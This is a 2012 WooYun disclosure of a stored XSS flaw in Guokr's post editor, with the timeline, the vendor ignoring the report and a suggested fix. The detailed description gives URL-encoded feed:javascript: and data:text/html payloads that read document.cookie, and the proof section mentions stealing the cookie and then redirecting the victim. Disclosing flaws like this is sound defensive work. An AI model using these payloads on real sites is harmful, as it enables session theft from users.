当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011057

漏洞标题:果壳网存在储存型xss,可点击劫持

相关厂商:果壳传媒

漏洞作者: kamael

提交时间:2012-08-19 10:55

修复时间:2012-08-24 10:56

公开时间:2012-08-24 10:56

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-19: 细节已通知厂商并且等待厂商处理中
2012-08-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

果壳网在发帖过滤上存在过滤不严的情况,可导致点击劫持

详细说明:

这个在果壳网能发帖的地方几乎都是,不过只针对firefox浏览器用户。在插入链接的时候没有严格检查A标签的协议,导致可以插入feed:,data:等标签。当然直接插是不能的,不过抓包一下,修改对应的链接就可以了。
原本的post应该是这样:content=%5Burl+href%3Dhttp%3A%2F%2Frenren.com%5Dhttp%3A%2F%2Frenren.com%5B%2Furl%5D
可以抓包后把中间的"http%3A%2F%2Frenren.com"改为"feed%3ajavascript%3a%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%76%6F%69%64%28%30%29%3B"或"data:%74%65%78%74%2F%68%74%6D%6C%2C%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%76%69%6F%64%28%30%29%3B%3C%2F%73%63%72%69%70%74%3E",发帖后firefox用户点击就悲剧了。
证明看下面。

漏洞证明:


获取cookie后把窗口导向真正的网站就行了。

修复方案:

只允许a标签里插入http://头

版权声明:转载请注明来源 kamael@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-08-24 10:56

厂商回复:

最新状态:

暂无